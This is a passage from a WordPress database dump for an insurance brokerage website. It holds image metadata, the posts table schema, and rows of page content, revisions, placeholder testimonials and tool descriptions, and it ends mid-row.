:5:\"width\";i:175;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"single-page\";a:4:{s:4:\"file\";s:24:\"eib-slider-2-587x202.png\";s:5:\"width\";i:587;s:6:\"height\";i:202;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"sidebar_latest\";a:4:{s:4:\"file\";s:23:\"eib-slider-2-210x72.png\";s:5:\"width\";i:210;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sidebar_featured\";a:4:{s:4:\"file\";s:23:\"eib-slider-2-187x64.png\";s:5:\"width\";i:187;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(710,455,'_wp_attached_file','2014/04/eib-slider-1.png'),(711,455,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:910;s:6:\"height\";i:313;s:4:\"file\";s:24:\"2014/04/eib-slider-1.png\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"eib-slider-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"eib-slider-1-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"eib-slider-1-238x82.png\";s:5:\"width\";i:238;s:6:\"height\";i:82;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"footer_latest\";a:4:{s:4:\"file\";s:23:\"eib-slider-1-115x40.png\";s:5:\"width\";i:115;s:6:\"height\";i:40;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"featured_tools\";a:4:{s:4:\"file\";s:23:\"eib-slider-1-185x64.png\";s:5:\"width\";i:185;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"blog\";a:4:{s:4:\"file\";s:23:\"eib-slider-1-175x60.png\";s:5:\"width\";i:175;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"single-page\";a:4:{s:4:\"file\";s:24:\"eib-slider-1-587x202.png\";s:5:\"width\";i:587;s:6:\"height\";i:202;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"sidebar_latest\";a:4:{s:4:\"file\";s:23:\"eib-slider-1-210x72.png\";s:5:\"width\";i:210;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sidebar_featured\";a:4:{s:4:\"file\";s:23:\"eib-slider-1-187x64.png\";s:5:\"width\";i:187;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(735,45,'_thumbnail_id','443'),(738,39,'_thumbnail_id','443'),(741,477,'_edit_lock','1453302274:1'),(744,477,'_edit_last','1'),(747,477,'_wp_page_template','default'),(750,484,'_edit_lock','1453299968:1'),(753,484,'_edit_last','1'),(756,484,'_wp_page_template','default'),(785,277,'_wpmem_block','1'),(788,288,'_wpmem_block','1'),(791,283,'_wpmem_block','1'),(794,290,'_wpmem_block','1'); /*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_posts` -- DROP TABLE IF EXISTS `wp_posts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_posts` ( `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `post_author` bigint(20) unsigned NOT NULL DEFAULT '0', `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content` longtext NOT NULL, `post_title` text NOT NULL, `post_excerpt` text NOT NULL, `post_status` varchar(20) NOT NULL DEFAULT 'publish', `comment_status` varchar(20) NOT NULL DEFAULT 'open', `ping_status` varchar(20) NOT NULL DEFAULT 'open', `post_password` varchar(20) NOT NULL DEFAULT '', `post_name` varchar(200) NOT NULL DEFAULT '', `to_ping` text NOT NULL, `pinged` text NOT NULL, `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content_filtered` longtext NOT NULL, `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0', `guid` varchar(255) NOT NULL DEFAULT '', `menu_order` int(11) NOT NULL DEFAULT '0', `post_type` varchar(20) NOT NULL DEFAULT 'post', `post_mime_type` varchar(100) NOT NULL DEFAULT '', `comment_count` bigint(20) NOT NULL DEFAULT '0', PRIMARY KEY (`ID`), KEY `post_name` (`post_name`), KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`), KEY `post_parent` (`post_parent`), KEY `post_author` (`post_author`) ) ENGINE=InnoDB AUTO_INCREMENT=523 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_posts` -- LOCK TABLES `wp_posts` WRITE; /*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */; INSERT INTO `wp_posts` VALUES (4,1,'2014-04-21 22:32:11','2014-04-21 22:32:11','','Media','','private','closed','closed','','media','','','2014-04-21 22:32:11','2014-04-21 22:32:11','',0,'http://localhost/empire/?option-tree=media',0,'option-tree','',0),(6,1,'2014-04-22 00:15:40','2014-04-22 00:15:40','<div class=\"about-sub-content\">\r\n<h1>Welcome to EIB, where Life Solutions are Beyond Expectations!</h1>\r\n</div>\r\n<div class=\"about-content\">\r\n\r\nAs the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients.\r\n\r\n</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">\r\n\r\nBy joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.\r\n\r\n</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">\r\n\r\nAs an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field.\r\n\r\n</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">\r\n\r\nIt is a privilege to have you here.\r\n\r\n</div>','Home','','publish','open','open','','home','','','2016-01-06 06:44:35','2016-01-06 06:44:35','',0,'http://localhost/empire/?page_id=6',0,'page','',0),(7,1,'2014-04-22 00:15:40','2014-04-22 00:15:40','','Home','','inherit','open','open','','6-revision-v1','','','2014-04-22 00:15:40','2014-04-22 00:15:40','',6,'http://localhost/empire/?p=7',0,'revision','',0),(8,1,'2014-04-22 00:15:59','2014-04-22 00:15:59','\r\n<div class=\"col-sm-5\">\r\n<div class=\"contact-address\">\r\n<div class=\"title\">\r\n\r\nEmpire Insurance Brokerage\r\n\r\n</div>\r\n38 Skillman Street\r\n\r\nBrooklyn, NY 11205\r\n\r\nphone (718) 218-9647\r\n\r\nfax (718)-599-1440\r\n\r\n<a href=\"#\">info@empireins.com</a>\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-7\">[map]</div>','contact us','','publish','open','closed','','contact','','','2014-04-29 06:16:59','2014-04-29 06:16:59','',0,'http://localhost/empire/?page_id=8',0,'page','',0),(9,1,'2014-04-22 00:16:10','2014-04-22 00:16:10','<div class=\"page-post-sub-content\">As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients. By joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">As an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field. Furthermore, you can follow your policy as it gets approved and issued, by visiting your customized portal on our website.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">Please feel free to contact us via email or give us a call at 718.218.9647.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">It is a privilege to have you here. …Welcome…</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">David Braver CEO & President</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\"><a title=\"Meet the EIB Team\" href=\"http://www.empireins.com/about-us/meet-the-eib-team/\">Learn more about the rest of the EIB Team...</a></div>','about us','','publish','open','closed','','about-us','','','2015-07-25 16:19:48','2015-07-25 16:19:48','',0,'http://localhost/empire/?page_id=9',0,'page','',0),(10,1,'2014-04-22 00:16:20','2014-04-22 00:16:20','<p class=\"page-post-sub-content\">It is said that hard work is it\'s own reward, and while that is true, it is also great to get away and recharge. The insurance companies below can help you do just that with a little concentrated effort.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h1 class=\"page-post-sub-content\">Insurance Company Incentives</h1>\r\n<ul>\r\n <li><strong>American National</strong>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2014/04/ANICO-2016_conference.pdf\" target=\"_blank\">2016 Marketing Conference</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Assurity</strong>:\r\n<ul>\r\n <li><a href=\"http://mrk.assurity.com/LeadersConf/2016/HIBlast_0315.htm\" target=\"_blank\">2016 Leader\'s Conference</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>John Hancock</strong>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf\">2016 Insurance Summit</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/South-Africa-PRODUCER.pdf\">2016 South Africa Luxury Adventure</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Term-Summit-2016.pdf\">2016 Term Summit</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Lincoln Financial</strong></li>\r\n <li><strong>Mutual Of Omaha </strong>\r\n<ul>\r\n <li><strong> </strong><a href=\"http://mutualsalesleaders.com/\" target=\"_blank\">Mutual Sales Leader</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Penn Mutual </strong>\r\n<ul>\r\n <li><a href=\"https://www.travelhq.com/events/pennmutualgoldeneagle2016/pretrip/home.mtc\" target=\"_blank\">2016 Golden Eagle</a></li>\r\n <li><a href=\"https://www.travelhq.com/events/pennmutualroyalblue2016/pretrip/home.mtc\" target=\"_blank\">2016 Royal Blue</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Transamerica</strong>\r\n<ul>\r\n <li>Leading Distributors Club Convention: <a href=\"http://www.engagengo.com/transamericabarcelona/site/index.php?id=splash\" target=\"_blank\">Experience Barcelona</a></li>\r\n <li><a href=\"http://www.engagengo.com/transamerica51976/site/index.php?id=1\" target=\"_blank\">Break Away and Travel</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n ','incentives','','publish','open','closed','','insentives','','','2016-01-11 17:14:09','2016-01-11 17:14:09','',0,'http://localhost/empire/?page_id=10',0,'page','',0),(11,1,'2014-04-22 00:15:59','2014-04-22 00:15:59','','contact','','inherit','open','open','','8-revision-v1','','','2014-04-22 00:15:59','2014-04-22 00:15:59','',8,'http://localhost/empire/?p=11',0,'revision','',0),(12,1,'2014-04-22 00:16:10','2014-04-22 00:16:10','','General','','inherit','open','open','','9-revision-v1','','','2014-04-22 00:16:10','2014-04-22 00:16:10','',9,'http://localhost/empire/?p=12',0,'revision','',0),(13,1,'2014-04-22 00:16:20','2014-04-22 00:16:20','','News','','inherit','open','open','','10-revision-v1','','','2014-04-22 00:16:20','2014-04-22 00:16:20','',10,'http://localhost/empire/?p=13',0,'revision','',0),(14,1,'2014-04-22 00:16:34','2014-04-22 00:16:34','','news','','publish','open','closed','','news','','','2014-04-29 06:20:21','2014-04-29 06:20:21','',0,'http://localhost/empire/?page_id=14',0,'page','',0),(15,1,'2014-04-22 00:16:34','2014-04-22 00:16:34','','blog','','inherit','open','open','','14-revision-v1','','','2014-04-22 00:16:34','2014-04-22 00:16:34','',14,'http://localhost/empire/?p=15',0,'revision','',0),(17,1,'2014-04-22 00:18:27','2014-04-22 00:18:27',' ','','','publish','open','open','','17','','','2015-12-11 09:02:53','2015-12-11 09:02:53','',0,'http://localhost/empire/?p=17',3,'nav_menu_item','',0),(18,1,'2014-04-22 00:18:27','2014-04-22 00:18:27',' ','','','publish','open','open','','18','','','2015-12-11 09:02:53','2015-12-11 09:02:53','',0,'http://localhost/empire/?p=18',2,'nav_menu_item','',0),(19,1,'2014-04-22 00:18:27','2014-04-22 00:18:27',' ','','','publish','open','open','','19','','','2015-12-11 09:02:53','2015-12-11 09:02:53','',0,'http://localhost/empire/?p=19',7,'nav_menu_item','',0),(20,1,'2014-04-22 00:18:27','2014-04-22 00:18:27',' ','','','publish','open','open','','20','','','2015-12-11 09:02:53','2015-12-11 09:02:53','',0,'http://localhost/empire/?p=20',1,'nav_menu_item','',0),(22,1,'2014-04-22 17:28:06','2014-04-22 17:28:06','','agent-portal','','inherit','open','open','','agent-portal','','','2014-04-22 17:28:06','2014-04-22 17:28:06','',4,'http://localhost/empire/wp-content/uploads/2014/04/agent-portal.png',0,'attachment','image/png',0),(30,1,'2014-04-22 20:16:16','2014-04-22 20:16:16','','slide-1','','inherit','open','open','','slide-1','','','2014-04-22 20:16:16','2014-04-22 20:16:16','',4,'http://localhost/empire/wp-content/uploads/2014/04/slide-1.png',0,'attachment','image/png',0),(31,1,'2014-04-22 21:02:43','2014-04-22 21:02:43','<div class=\"about-home-section\">\r\n <div class=\"about-title\">\r\n <img alt=\"\" src=\"<?php echo get_template_directory_uri(); ?>/images/about-title-img.png\"> About <strong>Empire Insurance Brokerage</strong>\r\n </div>\r\n <div class=\"about-sub-content\">\r\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus. \r\n </div>\r\n <div class=\"about-content\">\r\n Sed in eros egestas, vehicula turpis pellentesque, condimentum nisl. Maecenas imperdiet diam nisl. Mauris pharetra vehicula turpis id lobortis. Phasellus sit amet arcu at ligula posuere pulvinar. Etiam vel enim a augue dapibus cursus ut at justo. Nulla sit amet laoreet quam. Vivamus quis tincidunt quam, vel congue ligula. Praesent ut tincidunt diam. Aliquam quis mi at lectus convallis bibendum sed vitae diam. Vestibulum eget arcu et dolor mollis gravida.\r\n </div>\r\n </div>','Home','','inherit','open','open','','6-revision-v1','','','2014-04-22 21:02:43','2014-04-22 21:02:43','',6,'http://localhost/empire/?p=31',0,'revision','',0),(32,1,'2014-04-22 21:10:00','2014-04-22 21:10:00','Sed in eros egestas, vehicula turpis pellentesque, condimentum nisl. Maecenas imperdiet diam nisl. Mauris pharetra vehicula turpis id lobortis. Phasellus sit amet arcu at ligula posuere pulvinar. Etiam vel enim a augue dapibus cursus ut at justo. Nulla sit amet laoreet quam. Vivamus quis tincidunt quam, vel congue ligula. Praesent ut tincidunt diam. Aliquam quis mi at lectus convallis bibendum sed vitae diam. Vestibulum eget arcu et dolor mollis gravida.','Home','','inherit','open','open','','6-revision-v1','','','2014-04-22 21:10:00','2014-04-22 21:10:00','',6,'http://localhost/empire/?p=32',0,'revision','',0),(33,1,'2014-04-22 21:10:28','2014-04-22 21:10:28','Sed in eros egestas, vehicula turpis pellentesque, condimentum nisl. Maecenas imperdiet diam nisl. Mauris pharetra vehicula turpis id lobortis. Phasellus sit amet arcu at ligula posuere pulvinar. Etiam vel enim a augue dapibus cursus ut at justo. Nulla sit amet laoreet quam. Vivamus quis tincidunt quam, vel congue ligula. Praesent ut tincidunt diam. Aliquam quis mi at lectus convallis bibendum sed vitae diam. Vestibulum eget arcu et dolor mollis gravida.<a href=\"http://localhost/empire/wp-content/uploads/2014/04/agent-portal.png\"><img class=\"alignnone size-full wp-image-22\" src=\"http://localhost/empire/wp-content/uploads/2014/04/agent-portal.png\" alt=\"agent-portal\" width=\"169\" height=\"72\" /></a>','Home','','inherit','open','open','','6-revision-v1','','','2014-04-22 21:10:28','2014-04-22 21:10:28','',6,'http://localhost/empire/?p=33',0,'revision','',0),(34,1,'2014-04-22 21:14:58','2014-04-22 21:14:58','<div class=\"about-home-section\">\r\n<div class=\"about-title\">\r\n<img alt=\"\" src=\"<?php echo get_template_directory_uri(); ?>/images/about-title-img.png\"> About <strong>Empire Insurance Brokerage</strong>\r\n</div>\r\n<div class=\"about-sub-content\">\r\nLorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.\r\n</div>\r\n<div class=\"about-content\">\r\nSed in eros egestas, vehicula turpis pellentesque, condimentum nisl. Maecenas imperdiet diam nisl. Mauris pharetra vehicula turpis id lobortis. Phasellus sit amet arcu at ligula posuere pulvinar. Etiam vel enim a augue dapibus cursus ut at justo. Nulla sit amet laoreet quam. Vivamus quis tincidunt quam, vel congue ligula. Praesent ut tincidunt diam. Aliquam quis mi at lectus convallis bibendum sed vitae diam. Vestibulum eget arcu et dolor mollis gravida.\r\n</div>\r\n</div>','Home','','inherit','open','open','','6-revision-v1','','','2014-04-22 21:14:58','2014-04-22 21:14:58','',6,'http://localhost/empire/?p=34',0,'revision','',0),(35,1,'2014-04-22 21:15:21','2014-04-22 21:15:21','<div class=\"about-home-section\">\r\n<div class=\"about-title\">\r\n<img alt=\"\" src=\"<?php echo get_template_directory_uri(); ?>/images/about-title-img.png\"> About <strong>Empire Insurance Brokerage</strong>\r\n</div>\r\n<div class=\"about-sub-content\">\r\nLorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.\r\n</div>\r\n<div class=\"about-content\">\r\nSed in eros egestas, vehicula turpis pellentesque, condimentum nisl. Maecenas imperdiet diam nisl. Mauris pharetra vehicula turpis id lobortis. Phasellus sit amet arcu at ligula posuere pulvinar. Etiam vel enim a augue dapibus cursus ut at justo. Nulla sit amet laoreet quam. Vivamus quis tincidunt quam, vel congue ligula. Praesent ut tincidunt diam. Aliquam quis mi at lectus convallis bibendum sed vitae diam. Vestibulum eget arcu et dolor mollis gravida.\r\n</div>\r\n</div>','Home','','inherit','open','open','','6-revision-v1','','','2014-04-22 21:15:21','2014-04-22 21:15:21','',6,'http://localhost/empire/?p=35',0,'revision','',0),(37,1,'2015-07-25 14:45:41','2015-07-25 14:45:41','<div class=\"about-sub-content\">\r\n<h1>Welcome to EIB, where Life Solutions are Beyond Expectations!</h1>\r\n</div>\r\n<div class=\"about-content\">\r\n\r\nAs the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients.\r\n\r\n</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">\r\n\r\nBy joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.\r\n\r\n</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">\r\n\r\nAs an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field.\r\n\r\n</div>\r\n<div class=\"about-content\"></div>\r\n<div class=\"about-content\">\r\n\r\nIt is a privilege to have you here.\r\n\r\n</div>','Home','','inherit','open','open','','6-autosave-v1','','','2015-07-25 14:45:41','2015-07-25 14:45:41','',6,'http://localhost/empire/?p=37',0,'revision','',0),(38,1,'2014-04-22 21:19:09','2014-04-22 21:19:09','<div class=\"about-home-section\">\r\n<div class=\"about-title\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\"><img class=\"alignnone size-full wp-image-36\" src=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\" alt=\"about-title-img\" width=\"28\" height=\"28\" /></a> <strong>Empire Insurance Brokerage</strong></div>\r\n<div class=\"about-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">Sed in eros egestas, vehicula turpis pellentesque, condimentum nisl. Maecenas imperdiet diam nisl. Mauris pharetra vehicula turpis id lobortis. Phasellus sit amet arcu at ligula posuere pulvinar. Etiam vel enim a augue dapibus cursus ut at justo. Nulla sit amet laoreet quam. Vivamus quis tincidunt quam, vel congue ligula. Praesent ut tincidunt diam. Aliquam quis mi at lectus convallis bibendum sed vitae diam. Vestibulum eget arcu et dolor mollis gravida.</div>\r\n</div>','Home','','inherit','open','open','','6-revision-v1','','','2014-04-22 21:19:09','2014-04-22 21:19:09','',6,'http://localhost/empire/?p=38',0,'revision','',0),(39,1,'2014-04-22 21:32:55','2014-04-22 21:32:55',' \r\n\r\nNeed a quote on a new case? Use the on line Term Quote engine to check prices from all the leading carriers in the life insurance industry.','Term Quotes','','publish','closed','closed','','lorem-sum-dolor-sit','','','2016-01-14 20:30:30','2016-01-14 20:30:30','',0,'http://localhost/empire/?post_type=featured_tools&p=39',3,'featured_tools','',0),(41,1,'2014-04-22 21:34:23','2014-04-22 21:34:23','','news-01','','inherit','open','open','','news-01','','','2014-04-22 21:34:23','2014-04-22 21:34:23','',4,'http://localhost/empire/wp-content/uploads/2014/04/news-01.png',0,'attachment','image/png',0),(42,1,'2015-11-07 14:30:34','2015-11-07 14:30:34',' \n\nEvery life insurance','Term Quotes','','inherit','open','open','','39-autosave-v1','','','2015-11-07 14:30:34','2015-11-07 14:30:34','',39,'http://localhost/empire/?p=42',0,'revision','',0),(44,1,'2014-04-22 21:45:52','2014-04-22 21:45:52','','feature-content-01','','inherit','open','open','','feature-content-01','','','2014-04-22 21:45:52','2014-04-22 21:45:52','',39,'http://localhost/empire/wp-content/uploads/2014/04/feature-content-01.png',0,'attachment','image/png',0),(45,1,'2014-04-22 21:47:19','2014-04-22 21:47:19',' \r\n\r\nStay up to date on all of your pending cases with EIB\'s on line Case Status portal.','Case Status','','publish','closed','closed','','lorem-sum-dolor-sit-2','','','2016-01-14 20:28:48','2016-01-14 20:28:48','',0,'http://localhost/empire/?post_type=featured_tools&p=45',0,'featured_tools','',0),(46,1,'2014-04-22 21:47:26','2014-04-22 21:47:26',' \r\n\r\nReady to take an application or need to manage an in force policy? Everything you need is at your fingertips in the Forms Portal.','Forms','','publish','closed','closed','','lorem-sum-dolor-sit-3','','','2015-12-29 11:24:23','2015-12-29 11:24:23','',0,'http://localhost/empire/?post_type=featured_tools&p=46',1,'featured_tools','',0),(47,1,'2014-04-22 21:47:34','2014-04-22 21:47:34',' \r\n\r\nInterested in doing business more efficiently and profitably? Use iGo to submit your next life application!','iGo','','publish','closed','closed','','lorem-sum-dolor-sit-4','','','2015-12-29 11:24:44','2015-12-29 11:24:44','',0,'http://localhost/empire/?post_type=featured_tools&p=47',2,'featured_tools','',0),(48,1,'2014-04-22 22:06:48','2014-04-22 22:06:48','Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.','John Doe','','publish','closed','closed','','lorem-ipsum-dolor-sit-amet-consectetur-5','','','2015-12-13 18:47:07','2015-12-13 18:47:07','',0,'http://localhost/empire/?post_type=testimonials&p=48',0,'testimonials','',0),(49,1,'2014-04-22 22:06:39','2014-04-22 22:06:39','Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.','John Doe','','publish','closed','closed','','lorem-ipsum-dolor-sit-amet-consectetur-4','','','2015-12-13 18:47:07','2015-12-13 18:47:07','',0,'http://localhost/empire/?post_type=testimonials&p=49',0,'testimonials','',0),(50,1,'2014-04-22 22:06:30','2014-04-22 22:06:30','Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.','John Doe','','publish','closed','closed','','lorem-ipsum-dolor-sit-amet-consectetur-3','','','2015-12-13 18:47:07','2015-12-13 18:47:07','',0,'http://localhost/empire/?post_type=testimonials&p=50',0,'testimonials','',0),(51,1,'2014-04-22 22:06:21','2014-04-22 22:06:21','Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.','John Doe','','publish','closed','closed','','lorem-ipsum-dolor-sit-amet-consectetur-2','','','2015-12-13 18:47:07','2015-12-13 18:47:07','',0,'http://localhost/empire/?post_type=testimonials&p=51',0,'testimonials','',0),(52,1,'2014-04-22 22:05:41','2014-04-22 22:05:41','Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.','John Doe','','publish','closed','closed','','lorem-ipsum-dolor-sit-amet-consectetur','','','2015-12-13 18:47:07','2015-12-13 18:47:07','',0,'http://localhost/empire/?post_type=testimonials&p=52',0,'testimonials','',0),(53,1,'2014-04-22 22:10:17','2014-04-22 22:10:17','Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.','Lorem ipsum dolor sit amet, consectetur','','inherit','open','open','','51-autosave-v1','','','2014-04-22 22:10:17','2014-04-22 22:10:17','',51,'http://localhost/empire/?p=53',0,'revision','',0),(54,1,'2014-04-22 22:10:18','2014-04-22 22:10:18','Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.','Lorem ipsum dolor sit amet, consectetur','','inherit','open','open','','50-autosave-v1','','','2014-04-22 22:10:18','2014-04-22 22:10:18','',50,'http://localhost/empire/?p=54',0,'revision','',0),(55,1,'2014-04-22 22:10:19','2014-04-22 22:10:19','Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.','Lorem ipsum dolor sit amet, consectetur','','inherit','open','open','','49-autosave-v1','','','2014-04-22 22:10:19','2014-04-22 22:10:19','',49,'http://localhost/empire/?p=55',0,'revision','',0),(56,1,'2014-04-22 22:25:35','2014-04-22 22:25:35','<div class=\"about-home-section general-section\">\r\n<div class=\"about-title\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\"><img class=\"alignnone size-full wp-image-36\" src=\"http://localhost/empire/wp-content/uploads/2014/04/about-title-img.png\" alt=\"about-title-img\" width=\"28\" height=\"28\" /></a><b>News</b></div>\r\n<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum 